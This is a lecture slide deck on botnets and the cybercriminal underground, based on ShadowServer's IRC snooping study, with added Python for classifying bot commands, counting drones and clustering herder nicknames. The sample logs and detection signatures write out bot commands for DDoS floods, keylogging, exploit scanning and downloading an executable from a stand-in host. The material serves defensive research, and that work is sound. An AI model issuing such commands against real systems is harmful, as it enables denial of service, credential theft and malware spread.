![Page 1: Speaker: Hom-Jay Hom Date:2009/11/17 Botnet, and the CyberCriminal Underground IEEE 2008 Hsin chun Chen Clinton J. Mielke II](https://reader036.vdocuments.site/reader036/viewer/2022062314/56649f1b5503460f94c310f1/html5/thumbnails/1.jpg)
Speaker: Hom-Jay Hom
Date: 2009/11/17
Botnet, and the CyberCriminal Underground
IEEE 2008
Hsin chun Chen
Clinton J. Mielke II
Outline
- Botnets
- ShadowServer
- Investigating the Botnet World
- Further Work
- Conclusion
112/04/20 2
Botnets (1/3)
- The earliest malware damaged systems or printed taunting messages.
- Traditional computer viruses copy themselves; Trojan horses masquerade as legitimate programs.
- Worms spread on their own by scanning for and infecting other hosts.
Botnets (2/3)
What botnets are used for:
- Infection
- DDoS attacks
- Spamming
- Espionage
- Proxies
- Click-through fraud
Botnets (3/3): The Underground Economy
- A hidden social network of cybercriminals.
- Participants sell their services to each other: spammers, bot-herders and malware authors; criminals gather to trade.
- Many botnets are actually rented out to other criminal organizations.
- Uses include phishing attacks and stock-market pump-and-dump schemes.
ShadowServer (1/2)
- ShadowServer is a nonprofit group.
- Honeypots passively collect malware.
- Malware analysis is passive (antivirus engines) and active (a sandbox that executes the untrusted malicious code in isolation to observe its behaviour).
ShadowServer (2/2): Snooping
- Newly discovered IRC networks are snooped and all IRC traffic is recorded.
- The IRC logs are analyzed by a pattern-matching signature system.
Investigating the Botnet World (1/9): Dataset Processing
[Figure: a processed log record, with fields ID, C&C ID, nickname, IP]
Investigating the Botnet World (2/9): Classify known command strings
- Event classes: DDoS command, infection event, password-theft event.
- The signature system analyzed and classified the logged commands and produced a compendium of what events occurred.
Investigating the Botnet World (3/9): 1. Nickname Enumeration
- Bot nicknames are distinguished from human ones by pattern: random numeric IDs versus dictionary-like names.
- The signature system also flags the nicknames that issued bot command strings, producing a sanitized list of human (herder) nicknames.
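Worked example of the two steps above (the signature classification of slide 2/9 and the nickname enumeration of slide 3/9), added here as an illustration; it is not ShadowServer's or the paper's code. The log-line format, the bot command dialect (rBot/Agobot-style `.ddos.syn`, `.advscan`, `.keylog`), the drone-nickname pattern and the sample log lines are all constructed assumptions.

```python
import re
from collections import Counter

# Event signatures matched against the message text of each IRC log line.
# The command dialect is an assumption modelled on common rBot/Agobot-style
# bots; the real ShadowServer signature set is not given on the page.
# Herder commands (".ddos.syn ...") and the bots' status replies
# ("[DDoS]: Flooding ...") map onto the same event class.
SIGNATURES = [
    ("ddos",           re.compile(r"^[.!](?:ddos|syn|udp)(?:\.\w+)?\s+\S+|\[DDoS\]", re.I)),
    ("infection",      re.compile(r"^[.!](?:advscan|scan)\s+\S+|\[SCAN\]|\[Exploit\]", re.I)),
    ("password_theft", re.compile(r"^[.!](?:keylog|getcdkeys|psniff)\b|\[KEYLOG\]", re.I)),
    ("download",       re.compile(r"^[.!](?:download|update)\s+https?://\S+|\[DOWNLOAD\]", re.I)),
]

# Assumed drone naming scheme: a country tag plus a random numeric ID,
# e.g. "[USA]|387214" or "GBR-771003". A nickname that is mostly digits
# is also treated as machine-generated.
BOT_NICK_RE = re.compile(r"^\[?[A-Z]{2,3}\]?[|_-]\d{4,}$")
MAX_DIGIT_RATIO = 0.4

# Constructed log format: "<timestamp> <nick> <message>".
LINE_RE = re.compile(r"^(\S+)\s+<([^>]+)>\s+(.*)$")

def parse_line(line):
    """Split one log line into (timestamp, nick, message), or None."""
    m = LINE_RE.match(line)
    return m.groups() if m else None

def classify(msg):
    """Return the event class of a message, or None if no signature fires."""
    for label, pat in SIGNATURES:
        if pat.search(msg):
            return label
    return None

def is_bot_nick(nick):
    """Heuristic: does this nickname look like a generated drone ID?"""
    if BOT_NICK_RE.match(nick):
        return True
    digits = sum(ch.isdigit() for ch in nick)
    return digits / max(len(nick), 1) >= MAX_DIGIT_RATIO

def analyze(lines):
    """Classify every line and enumerate nicknames.

    Returns (events, counts, humans, bots): the classified events, a
    per-class tally (the 'compendium'), the sanitized list of human
    nicknames and the list of drone nicknames.
    """
    events, counts, seen, commanders = [], Counter(), set(), set()
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, nick, msg = parsed
        seen.add(nick)
        label = classify(msg)
        if label is None:
            continue
        counts[label] += 1
        events.append({"ts": ts, "nick": nick, "event": label, "text": msg})
        if msg[:1] in (".", "!"):    # a command was issued: this is a herder
            commanders.add(nick)
    # A nickname is "human" if it issued commands or does not look generated.
    humans = sorted(n for n in seen if n in commanders or not is_bot_nick(n))
    bots = sorted(seen - set(humans))
    return events, counts, humans, bots

# Constructed sample log (nicknames, hosts and addresses are made up).
SAMPLE_LOG = [
    "2008-03-01T02:14:07 <x0r> .advscan lsass 200 5 0 -r -s",
    "2008-03-01T02:14:09 <[USA]|387214> [SCAN]: Random Port Scan started on 10.0.0.x:445",
    "2008-03-01T02:20:33 <x0r> .ddos.syn 198.51.100.23 80 600",
    "2008-03-01T02:21:00 <[DEU]|559102> [DDoS]: Flooding: (198.51.100.23) for 600 seconds.",
    "2008-03-01T03:02:11 <x0r> .keylog on",
    "2008-03-01T03:05:40 <x0r> hey d4rk, channel key still the same?",
    "2008-03-01T03:06:02 <d4rk> .download http://example.org/u.exe 1 1",
    "2008-03-01T03:06:30 <GBR-771003> [DOWNLOAD]: Downloading URL: http://example.org/u.exe",
]

if __name__ == "__main__":
    events, counts, humans, bots = analyze(SAMPLE_LOG)
    for e in events:
        print(e["ts"], e["nick"], e["event"], "<-", e["text"])
    print("compendium:", dict(counts))
    print("humans:", humans)
    print("bots:", bots)
```

The chat line "hey d4rk, channel key still the same?" matches no signature and is the reason the sanitized list keeps nicknames that merely talk: a herder is recognised either by the command strings it issues or by a nickname that does not fit the generated-ID pattern. Real signature sets need the same two-sided check, because a drone that echoes a command verbatim would otherwise be counted as a herder.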
Investigating the Botnet World (4/9): 2. Drone Counting
- A simple approach: bot state is tracked in a lookup table that feeds a population counter.
- A more refined approach: replay the IRC events (joins, parts, quits) observed in the snooped channel.
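The drone counter below is an added example, not ShadowServer's code: it parses raw IRC server lines in RFC 1459 syntax as a snooping client would log them, seeds the lookup table from the NAMES (353) reply received on joining, then replays JOIN/PART/QUIT/KICK/NICK to keep the table current and emit the drone population after each change. The timestamped log format, the channel name, the set of known non-drone nicknames and the sample lines are constructed.

```python
import re

# One logged line: "<timestamp> [:prefix] <COMMAND> <params>", where the
# timestamp is added by the logging client (constructed format) and the
# rest is an RFC 1459 IRC message.
IRC_RE = re.compile(r"^(\S+)\s+(?::(\S+)\s+)?(\S+)\s*(.*)$")

def parse_irc(line):
    """Return (timestamp, source nick or None, COMMAND, [params]) or None."""
    m = IRC_RE.match(line)
    if not m:
        return None
    ts, prefix, cmd, rest = m.groups()
    nick = prefix.split("!", 1)[0] if prefix else None
    # Middle params are space-separated; a trailing param starts with ':'.
    if rest.startswith(":"):
        middle, trailing = "", rest[1:]
    elif " :" in rest:
        middle, trailing = rest.split(" :", 1)
    else:
        middle, trailing = rest, None
    params = middle.split()
    if trailing is not None:
        params.append(trailing)
    return ts, nick, cmd.upper(), params

def drone_population(lines, channel, non_drones):
    """Replay the snooped channel's membership changes.

    `present` is the lookup table of nicknames currently in the channel;
    after every change the drone count (members not in `non_drones`, i.e.
    not the snoop itself and not a known human) is appended to the series.
    """
    present = set()
    series = []
    for line in lines:
        parsed = parse_irc(line)
        if parsed is None:
            continue
        ts, nick, cmd, params = parsed
        if cmd == "353" and len(params) >= 4 and params[2] == channel:
            # NAMES reply on joining seeds the table with everyone already there;
            # strip channel-mode prefixes such as @ (op) and + (voice).
            present.update(n.lstrip("@+%") for n in params[3].split())
        elif cmd == "JOIN" and nick and params and params[0] == channel:
            present.add(nick)
        elif cmd == "PART" and nick and params and params[0] == channel:
            present.discard(nick)
        elif cmd == "QUIT" and nick:
            present.discard(nick)
        elif cmd == "KICK" and len(params) >= 2 and params[0] == channel:
            present.discard(params[1])
        elif cmd == "NICK" and nick in present and params:
            present.discard(nick)
            present.add(params[0])
        else:
            continue
        series.append((ts, len(present - non_drones)))
    return series

# Constructed sample: the snoop "snoop" joins #c; nicknames and hosts are made up.
SAMPLE_IRC = [
    "2008-03-01T02:00:00 :snoop!~s@h JOIN :#c",
    "2008-03-01T02:00:01 :irc.example.net 353 snoop = #c :snoop [USA]|387214 [DEU]|559102 @x0r",
    "2008-03-01T02:00:01 :irc.example.net 366 snoop #c :End of /NAMES list.",
    "2008-03-01T02:05:12 :[GBR]|771003!~b@h3 JOIN :#c",
    "2008-03-01T02:09:40 :[DEU]|559102!~b@h2 QUIT :Ping timeout",
    "2008-03-01T02:15:02 :[USA]|387214!~b@h1 NICK :[USA]|387215",
    "2008-03-01T02:30:00 :[FRA]|120044!~b@h4 JOIN :#c",
    "2008-03-01T02:31:11 :x0r!~h@h0 KICK #c [FRA]|120044 :bye",
    "2008-03-01T02:45:00 :[GBR]|771003!~b@h3 PART #c",
]
NON_DRONES = {"snoop", "x0r"}   # the snoop itself plus known human nicknames

if __name__ == "__main__":
    series = drone_population(SAMPLE_IRC, "#c", NON_DRONES)
    for ts, n in series:
        print(ts, n)
    print("peak drones:", max(n for _, n in series))
```

The NICK case matters for the refined approach: a drone that renames itself must not be counted twice, and a drone that times out must leave the table even though QUIT carries no channel name. Population numbers from a single snoop still undercount drones that never join (for example, bots that connect only to issue a report), so treat the series as a lower bound.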
Investigating the Botnet World (5/9)
[Figure: bot population over time (y-axis 0 to 600), showing a daily cycle with daytime peaks and night-time troughs]
Investigating the Botnet World (6/9): Key Players
- Rank the botnet herders by counting the C&C channels they control.
- Herders also detect other herders' botnet C&C channels and subvert their security mechanisms.
Investigating the Botnet World (7/9): Criminal Social Network
- Analyze the community structure over all pre-filtered "human" nicknames.
- Nodes are nicknames; any two nodes found collaborating in the same C&C channel are linked.
- Edge weights were assigned with the Jaccard similarity metric.
Investigating the Botnet World (8/9)
- Hierarchical agglomerative clustering algorithm with a minimum similarity of 50%.
- 957 nicknames were grouped into 104 clusters.
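An added example of the graph construction and clustering on slides 7/9 and 8/9; it is not the paper's code. The slides do not say which sets the Jaccard metric compares, so this example assumes each nickname is represented by the set of C&C channels it was seen in, and it uses average linkage for the agglomerative step (another assumption). The nickname-to-channel data is constructed.

```python
from itertools import combinations

# Constructed: the C&C channels each pre-filtered "human" nickname was seen in.
NICK_CHANNELS = {
    "x0r":   {"#c1", "#c2", "#c3"},
    "d4rk":  {"#c1", "#c2"},
    "lum3n": {"#c3", "#c4"},
    "pwn3r": {"#c5"},
    "r3ap":  {"#c5", "#c6"},
    "lone":  {"#c9"},
}

def jaccard(a, b):
    """|A ∩ B| / |A ∪ B|; 0 when both sets are empty."""
    if not a and not b:
        return 0.0
    return len(a & b) / len(a | b)

def build_graph(nick_channels):
    """Edge between any two nicknames sharing a channel; weight = Jaccard."""
    edges = {}
    for u, v in combinations(sorted(nick_channels), 2):
        w = jaccard(nick_channels[u], nick_channels[v])
        if w > 0:
            edges[(u, v)] = w
    return edges

def cluster(nick_channels, min_similarity=0.5):
    """Average-linkage agglomerative clustering.

    Start with one cluster per nickname and repeatedly merge the most
    similar pair until no pair reaches min_similarity (50% on the slide).
    """
    clusters = [{n} for n in sorted(nick_channels)]

    def link(c1, c2):
        # Average pairwise Jaccard similarity between the two clusters.
        total = sum(jaccard(nick_channels[a], nick_channels[b]) for a in c1 for b in c2)
        return total / (len(c1) * len(c2))

    while True:
        best, best_pair = 0.0, None
        for i, j in combinations(range(len(clusters)), 2):
            s = link(clusters[i], clusters[j])
            if s > best:
                best, best_pair = s, (i, j)
        if best_pair is None or best < min_similarity:
            break
        i, j = best_pair          # i < j, so popping j leaves i valid
        clusters[i] |= clusters.pop(j)
    return sorted(sorted(c) for c in clusters)

if __name__ == "__main__":
    for (u, v), w in sorted(build_graph(NICK_CHANNELS).items()):
        print(f"{u} -- {v}: {w:.2f}")
    for group in cluster(NICK_CHANNELS):
        print("cluster:", group)
```

With this data x0r and d4rk merge first (2/3), pwn3r and r3ap merge exactly at the 0.5 threshold, and lum3n stays out because its average similarity to the x0r/d4rk cluster is only 0.125. The threshold check uses `best < min_similarity`, so a pair sitting exactly on 50% is merged; change it to `<=` if the intended reading of "minimum similarity" is strict.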
Investigating the Botnet World (9/9): Of the 104 clusters
[Figure: breakdown of the 104 clusters by observed activity; legend C: C&C, D: DDoS, B: Bot, P: Victim passwords]
Further Work
- Many herders use close variations of the same nickname.
- Profile the behavioural characteristics of herders.
- Beyond hierarchical clustering: biclustering or hypergraph analysis of nicknames and channels together.
- To better profile DDoS attack motivations, DDoS targets must be individually scrutinized; target IP addresses could be correlated with latitude and longitude.
Conclusion
- Cybercrime has grown in recent years to encompass world-influencing crimes.
- Tracking these miscreants and their botnets will become more and more challenging.
- Individuals need to secure themselves.
- ShadowServer hopes to assist in whatever way we can to make the Internet a safer place.
END